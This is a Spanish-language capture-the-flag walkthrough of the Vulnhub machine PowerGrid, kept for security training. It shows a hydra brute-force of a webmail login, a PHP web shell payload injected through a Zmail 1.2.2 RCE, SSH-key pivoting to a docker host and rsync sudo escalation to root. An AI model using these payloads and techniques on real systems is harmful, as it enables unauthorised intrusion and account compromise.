Hoy vamos a hackear la maquina de Vulnhub llamada
PowerGrid. Podeis descargarla desde el siguiente enlace:
https://www.vulnhub.com/entry/powergrid-101,485/
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
~ > nmap -A -p- 192.168.1.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 10:42 CEST
Nmap scan report for powergrid.home (192.168.1.147)
Host is up (0.00051s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: PowerGrid - Turning your lights off unless you pay.
143/tcp open imap Dovecot imapd
|_imap-capabilities: more capabilities IMAP4rev1 post-login IDLE have STARTTLS
ID ENABLE SASL-IR Pre-login OK LOGINDISABLEDA0001 LOGIN-REFERRALS listed
LITERAL+
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after: 2030-05-17T16:49:55
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: more IMAP4rev1 LITERAL+ post-login have capabilities ID
ENABLE SASL-IR Pre-login OK LOGIN-REFERRALS IDLE listed AUTH=PLAINA0001
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after: 2030-05-17T16:49:55
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.79 seconds
En la pagina inicial, vemos 3 posibles usuarios.
Por otro lado, gobuster encuentra el directorio /zmail, el cual
al entrar nos pide usuario y password.
Usamos hydra para hacer bruteforce y ver si obtenemos algun
password, en este caso probamos con el usuario p48.
~ > hydra -l p48 -P rockyou.txt 192.168.1.147 http-get -m /zmail
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret
service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-18
10:44:18
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries
(l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.1.147:80/zmail
[STATUS] 8574.00 tries/min, 8574 tries in 00:01h, 14335825 to do in 27:53h, 16
active
[STATUS] 8741.00 tries/min, 26223 tries in 00:03h, 14318176 to do in 27:19h, 16
active
[STATUS] 8754.43 tries/min, 61281 tries in 00:07h, 14283118 to do in 27:12h, 16
active
[80][http-get] host: 192.168.1.147 login: p48 password: electrico
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-18
10:57:20
Vemos que hydra encuentra que electrico es la password
del usuario p48.
Entramos usando los credenciales.
En el mail encontramos:
Listen carefully. We are close to our attack date. Nothing is going to stop us
now. Our malware is heavily planted in each power grid across Europe.
All it takes is a signal from this server after the timer has stopped, and
nothing is going to stop that now.
For information, I have setup a backup server located on the same network - you
shouldn't need to access it for now, but if you do, scan for its local IP and
use the SSH key encrypted below (it is encrypted with your GPG key, by the
way).
The backup server has root access to this main server - if you need to make any
backups, I will leave it for you to work out how.
I haven't got time to explain - we are too close to launching our hack.
-----BEGIN PGP MESSAGE-----
hQIMA1WQQb/tVNOiARAAub7X4CF6QEiz1OgByDAO4xKwLCM2OqkrEVb09Ay2TVVr
2YY2Vc3CjioPmIp1jqNn/LVLm1Tbuuqi/0C0fbjUTIs2kOWqSQVVpinvLPgD4K+J
OykGxnN04bt9IrJddlkw3ZyZUjCBG46z+AS1h+IDCRezGz6Xq9lipFZwybSmL89J
pijIYF9JAl5PeSQK9kTHOkAXIsLUPvg8fsfa9UqGTZfxS6VhlNmsoFDf4mU6lSMl
k4VC2HDJwXoD+dEdV5dX1vMLQ5CKETR1NjaWV/D++YTaZMO+wj5/qekfhqDXh0Yo
4KhqKKlAbk/XhPuRmuj/FnS/8zwlYH9wPYuacBPXLwCIzaQzkn5I+7rVeeMqoT82
c2F7ASQy79COk9eU900ToCyjjXQwnlBaQ51QOZjnQgcEnKVmrbURgzpQUVzdy8Oy
XvysJt3OBIJ9zT1l7fq5slmCjVAq8G2nlhdNv1K27+79eVPzrJ3pqg+MlssXRb3T
PQ3hPgKR7U/YgU6O9YorAoJmgxD2CsmGrmK66jwbTKBONTxcfUg+gu1z8Ad4gleL
+Gbk4qMuLVFGzEBdeJYzRD7m6F3Ow/evwjzMr5fDdSOUSATOKuki0dOx14OTFNzP
CJbDZzquZ294lvFviYMSNQy7cWNN86gVQWyWUW0f+Ui3UONTIr9e0gLez/OJUwzS
6wHHu7TA3lgwvc/iMjpuPLnGo046T8J0IqXZHOIn0LJXP36I0l4vTAGtKpZuGNS+
zT/R1y6eIBd5CInFwLXbkbhOomwEfbHQci0zKHzjpEnx8a18zbuNLB4dclN3nyni
Fnh2S0YYPEoJXWKA6ToNuQF/GZyI8QKELyc4ZhkHiKmdN6Q9z659JWQOnM/MW+tB
sjxwjesbAO+hjc19ok0VUsiMVj8TnUuB1Ifgf4ItnDzP8Myc59/FaS46eVy7Y7M1
sICrc62wVLkglG2zjIvTF3CYPYrJDB6+BXOGJv7vpPdcbpaVwc1KYjZW9JMfVLIz
NGY1zaz5nY9sZw/Q5rmYyUAzHnMjuOkRNjRuSjEHHZEG/gLLco6GCeBQzZqvyiXM
auuvO37nFduss3U+7sLd4K3IabgZZHaEu4QEDiuZc40WVSZOIhv5srcLnky2GSPe
a0xjQxSvMNKroyx2IoKLNkUq1fDGbGD/Wu4erOz/TO0/SqnAJK9Mqh6CjUhAZwxE
m+ALMtyYd3wyUcclqG1ruprGKKMB0KRNxAtIL+RXmUvqhoPAazqZ/X6QW+mekt6f
/sBuDEXD++UPqYi24kO0E1UB8bdRNP+sVxdFMoImahcqRog1tPp09aVcLcEtQBIP
7CZ/kUsQmEe5yPbK5W/0xSo8+B4OranG9eHvjQlu/pS6GCsyT8NzEiZYMVQ5qs/A
04Rm5H5V7W+elw9svPBSjDj6XBhUvUekJ9jU7es018k2fZ8gid1kFurNZ7xOLyTL
ebzLqsOszwIhGYEpYnt2m9R0M7eoEq4pmwfra5oaaNrDhKFAp6DddERMNmembr42
cLH1xBWuE2AVqFwbeEUYjVt+Sy1OauuAGkMy9KxXSzR//1wQ0hojooz6XsY/a3c1
huvrG4CzMT8cPbNDMSvOGca0l+QpmQ7qg14sYZuJcqARue07DgpQIsOXeUspFooO
lOUsNrJwJcpWJViKuJ9XuwcprBowdz6Y6WmeY57R13ivoHy+j+2s2Sefq6rjMzEw
HtatDtk9BA4gBFREqSldmepAnvE3GiJJEYHwC7sQCoqNB15/ftTM9LtbMRe05FXm
9mLcD2aSP5BIy9jrCBJqPjdsnxupqeBxMx9do79iCXIXms6VbNpnBeKMZFrnFx+Z
LMd13s2pWA0CApb3JATcGa4adKs2k4L08oSr+revlX3fUvey090VSji+Kebi7gJ/
l08BWpMZbLbf9J6zgbLbWfl8OQbYLl94A8lTDK5m7JKLSSL/B16jx2LWPIGSszLS
NxlWCk0ae5Lf75Bbux12xkDukXsODd+hkksNQ4M/E8wgBoRmrL9P/CUX4YvrVT9u
qK98rhQPeIJMYwYiZVb4K7L18EyKK6S+jn5LwwUxzpkRRNZ8mg+lbtiSwTDtG8IK
l6+3kTIPcECGPbghf0GFH7PnQY8f0MO9IbYsy2pcoagGtizUecyraxPF9qPwoBV3
4QBz+/KLKUpqwLUoKc5PLn7RAJcXZiY8QkSBW6jbieoblylDOIuDjpd3IYqCqjW8
WOI/XS4zi5R3mozMosLrohm27iDsuFNnEIiWFITYTrHuNRk1xW4YoZPiW22mp7qE
xnhp7GpepiD8RoRjj0AJThSa2Mlva/bfHwm98Fk8j4R60stBqkK/+/7htpnwzQhF
e2w7UZwh+EmwNGPyfeWn/4OAS8evTQc2svc/qHXvrHRid/6yDQt4ZCsJmsLDUEkj
1KG++hRMC7TYPXP/LovWxm8JgKwI0T+szYMXDSVOdGEM/168y7UMA/v28NJ7emzf
cC8JWBH4u4XntgwzEsc02BaY1E0NJ86/JuOX4ajYxDWlXR+jJmmLWtbbI5mWW9mr
KaMzgdXQYQmmfMWJ/BLvb95FTg7R0QemsT1mk2jOfalaHz4670qRKhI48rb0+c6Y
COYINTgYLtO1BtKkOR9Y7MMcvmCD+GecL29gCvL+t+/VDLkvwvWErX4jTbjuLwJX
yGJKa7imlr4k72ZjhKJPivmdv4K8XtQKpBqtfop1Bma0EoFyQvIuuQpA9oP3qghl
MMFCF4PVpmSI0clZxJYcJX1VI6bkfc0hp4uj3Pu5+G6OJHPOsgoSdFwkX1dBFp2I
Yir6n929kn+OyX/T5hrBIiSs+1rujRC/AeV7+/BDVfoTk7Ti0MHnQ89K2L0xqayh
aw5mnpDFcOdBWBr5f5fBc2KxO8UK2Dyj5cTL05wvC8vzi81Zy8WzwEMnDAQ3hqTp
qymGZOhD1X0cpxRO3MTMHf7W3AJNmOqhU87teqDJQXmAeZ3Cy1zIIh3Y8Jem3A5y
7+dUSAJacrdfqf8CNsGLT7iiyGCHOQH8Pig/9yCP1lerGBMN3rXeqBqoxSSYGa5Q
OUzqgcvBwO6Enn4f9LPvKeMywhMgJU4MFtvSumulFYeoLJnzpDsXimFzXlKncKai
nzgqHgyZahwCo41DOvIdY5qSrkspUexqF80wy/C870rnvMIea9iiUT2+gSmM27zZ
0xKQ0pMZygMJ1/tGNAGdByvjcP3eZR9tclu4/nBiNQV3EcZzrp/GQ26lukzgHIp/
3w4U4DRtKleemh+ibKzHwnKiB766Z/DC2KBVtxK6AM4TiJ+0COfBiGTpi1hwNxfS
yI26D5VncheNkiOH9UEg7Smi5n104L7lFq8Z4w3uNR9IgMZSEbOKpPP5gvd8DlZC
QUJzYkPHWdQPBIVgqiboTw7UmKFxF3tne9lnZEmPgD5z6VUP5H3cixPCqBIMtM3s
WdaACLBSW8hebDTuJOHikONjUKcy+3pdLN/70CQ4uk7Zt+VVTL0bsYpmMqqBabU4
+xLXl2QiSLawg68DlE2aM/1DW219LfEiXO1AwGIAByP+j/g6tI3qujXT1UrimKHu
iIo9m9k/hQGPfm4jeNL3mgScuhOof4Xqh8QMpGMCXUQZUGvgzJa9gq4j/pe/8KK7
yYmpZGblM7y9ForPlM3dcZMGCnUtfjUf8p5f2HvWMWBZVMWe0EjI/5NqCLqrfBSx
0YzDg1eCiNCWS53OA2HeAu97QdVXWk0vCeq+KUmTNt9/mRqALpEUZ0REae7v5OhL
5YRfmnYwj+3zyvF4m/iC2rWKyQKREXN5vRaCWmTDpy54cU0sotpOLxTfnW6Ab/KR
y88xv7Si7n8yyBtWfBf6wTSXa7oo8f0KPxycNOiFAUJD9oGtL0ICpPeaZnW+2pCr
EWQat6BOsAjJIZALUVfOgJn8QyV6spySr5W91dp4dZ05v544ysT/zHJG29+iLmq6
7b7CiONwnj48KQhq7FF8iEu/Hi2qcoH9MCmog7i3QPGQXEq+6M1mtXAqXY43Qxmu
2m1PP5YLf47r4/cVccg721ag9ffLdL6kUkj9eHPAU/MqI3JX29HF9XTwSu07Vo32
Ym6niojCCeMsf9DuvR92UtOAwMjUrDiQQOM0eL2P7Z21IB6Zb+I7Iqws03zQ5nkD
TYVQnJbdsqsz7Egj+y/gh9Omg/iBxqP2qZ7uEAiQg4P/EEHPMBChe2+SRtYO139v
ChZA53z11q0DzTtmbhoHqIDQ97J9yrdQe6YHvW+zKQMcoEiiOaaJkF6pzmLBGQt2
EH9IQnxd39jtzzLsKWPFUe3G30ELm5TtnMd9WBQVtKNHxlCtD1eB3bTJgC6iHcOA
JowxDggqVtdxKQQEjLGquUkoS7Al5iMnuiA+AXFC5VMmnoPD9v/M3CZaM7qt6LOg
K5usFSp0gwjGvPQO1UJucrKyXSBlOxFbzOxcKClRGqHU4+Ir8Iu8MH1dlTmYH1Qr
UOdasHinj5UODyJyS7rHrzDr9kBKC7AAnCt0WHX7K3jVJEg0TnGpLFFIic7XrMld
6SXxrg0VWv1nqyKqaRXANGFqslktVGktJURntzj/kZD/9sO4Y6qoHMDNC3Aib3m9
RO1va5L9lriZ1vmP37FxIwsrCVVcNrPJxWydvw==
=fPY9
-----END PGP MESSAGE-----
Podemos ver que menciona que el mensaje esta encriptado con nuestra key privada
gpg, y que hay un server de "backup", el cual tiene acceso como root al sistema
principal...
Exploitation
Por otro lado al mirar la version de Zmail vemos que la version es 1.2.2 y
que es vulnerable al siguiente exploit[1].
Tras leer el POC vemos que tenemos que modificar el subject con un codigo php
que queremos que se ejecute, y al enviar el correo deberemos
modificar el "from", donde le pasaremos unos parametros para que nos guarde
lo que contiene el subject como un fichero php, al cual podremos acceder.
Sabiendo esto, arrancamos Burpsuite.
Creamos un nuevo correo y como subject ponemos:
<?php echo passthru($_GET['cmd']);?>
Como destinatario podemos poner example@example.com
Le damos a enviar e interceptamos la peticion con Burp.
Una vez interceptada, modificamos el campo from para que contenga:
Obtenemos la privatekey.gpg, con esto ya tendriamos
El mensaje cifrado, la key y la password(electrico).
Vamos a la siguiente web:
https://www.igolder.com/pgp/decryption/
E introducimos los datos necesarios para hacer el
decode del mensaje cifrado.
Una vez hecho obtenemos la key ssh.
Una vez tenemos la key, creamos un fichero
en el sistema con ella.
p48@powergrid:~$ ip addr show
ip addr show
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc pfifo_fast state UP
group default qlen 1000
link/ether 08:00:27:db:94:d2 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.62/24 brd 192.168.1.255 scope global dynamic eth0
valid_lft 84153sec preferred_lft 84153sec
inet6 2a01:c50e:21e3:0:a00:27ff:fedb:94d2/64 scope global dynamic
mngtmpaddr
valid_lft 1773sec preferred_lft 573sec
inet6 fe80::a00:27ff:fedb:94d2/64 scope link
valid_lft forever preferred_lft forever
3: docker0: mtu 1500 qdisc noqueue state UP
group default
link/ether 02:42:1e:c8:e0:9c brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:1eff:fec8:e09c/64 scope link
valid_lft forever preferred_lft forever
Vemos que tenemos la interfaz 3 llamada docker0 y que tiene la IP
172.17.0.1.
En el email aparecia que tenian un server de backup en la misma red
asi que hacemos ping a la siguiente IP de ese rango para ver si
encontramos el server de backup...
p48@powergrid:~$ ping 172.17.0.2 -c 1
ping 172.17.0.2 -c 1
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.061 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.061/0.061/0.061/0.000 ms
Vemos que la IP 172.17.0.2 responde.
Usamos la key para loguearnos en el server de backup.
p48@powergrid:~$ ssh p48@172.17.0.2 -i ssh.key
ssh p48@172.17.0.2 -i ssh.key
Linux ef117d7a978f 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 20 00:22:30 2020 from 172.17.0.1
p48@ef117d7a978f:~$
p48@ef117d7a978f:~$ cat flag2.txt
cat flag2.txt
047ddcd1f33dfb7d80da3ce04e89df73
Well done for getting flag 2. It looks like this user is fairly unprivileged.
Miramos si podemos hacer algo con sudo.
p48@ef117d7a978f:~$ sudo -l
sudo -l
Matching Defaults entries for p48 on ef117d7a978f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User p48 may run the following commands on ef117d7a978f:
(root) NOPASSWD: /usr/bin/rsync
Podemos untilizar rsync, el cual nos puede proporcionar
una shell de root :)
# cd /root
# ls -la
total 36
drwx------ 1 root root 4096 May 19 23:57 .
drwxr-xr-x 1 root root 4096 May 19 18:13 ..
lrwxrwxrwx 1 root root 9 May 19 18:33 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 May 19 19:00 .ssh
-rw------- 1 root root 8115 May 19 23:57 .viminfo
-rw-r--r-- 1 root root 112 May 19 23:57 flag3.txt
# cat flag3.txt
009a4ddf6cbdd781c3513da0f77aa6a2
Well done for getting the third flag. Are you any good at pivoting backwards?
En el mail decia que el root del servidor de backup tenia acceso
al servidor principal, asi que nos conectamos por ssh como root
al sistema principal de nuevo....
Privilege Escalation
# ssh root@172.17.0.1
Linux powergrid 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 26 18:15:49 2020
root@powergrid:~#
flag4.txt
root@powergrid:~# cd /root
cd /root
root@powergrid:~# ls -la
ls -la
total 72
drwx------ 7 root root 4096 May 26 18:15 .
drwxr-xr-x 18 root root 4096 May 19 17:42 ..
lrwxrwxrwx 1 root root 9 May 19 18:17 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 4 root root 4096 May 19 18:28 .cache
-rwx--x--x 1 root root 85 May 20 08:23 chown.sh
-rw-r--r-- 1 root root 472 May 20 08:25 flag4.txt
drwx------ 5 root root 4096 May 19 20:16 .gnupg
drwxr-xr-x 3 root root 4096 May 20 01:24 .local
-rwxr-xr-x 1 root root 494 May 20 00:49 malware.php
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 74 May 19 20:36 .selected_editor
drwx------ 2 root root 4096 May 19 20:00 .ssh
drwxr-xr-x 2 root root 4096 May 19 19:35 .vim
-rw------- 1 root root 11142 May 26 18:12 .viminfo
-rw------- 1 root root 55 May 19 18:24 .Xauthority
-rw-r--r-- 1 root root 1220 May 26 18:15 'ystemctl status docker'
root@powergrid:~# cat flag4.txt
f5afaf46ede1dd5de76eac1876c60130
Congratulations. This is the fourth and final flag. Make sure to delete
/var/www/html/startTime.txt to stop the attack (you will need to run chattr -i
/var/www/html/startTime.txt first).
_._ _,-'""`-._
(,-.`._,'( |\`-/|
`-.-' \ )-`( , o o)
`- \`_`"'-
This CTF was created by Thomas Williams - https://security.caerdydd.wales
Please visit my blog and provide feedback - I will be glad to hear your
comments.
root@powergrid:~#
End
Y con esto ya seriamos root de la maquina :
[1] https://www.exploit-db.com/exploits/40892
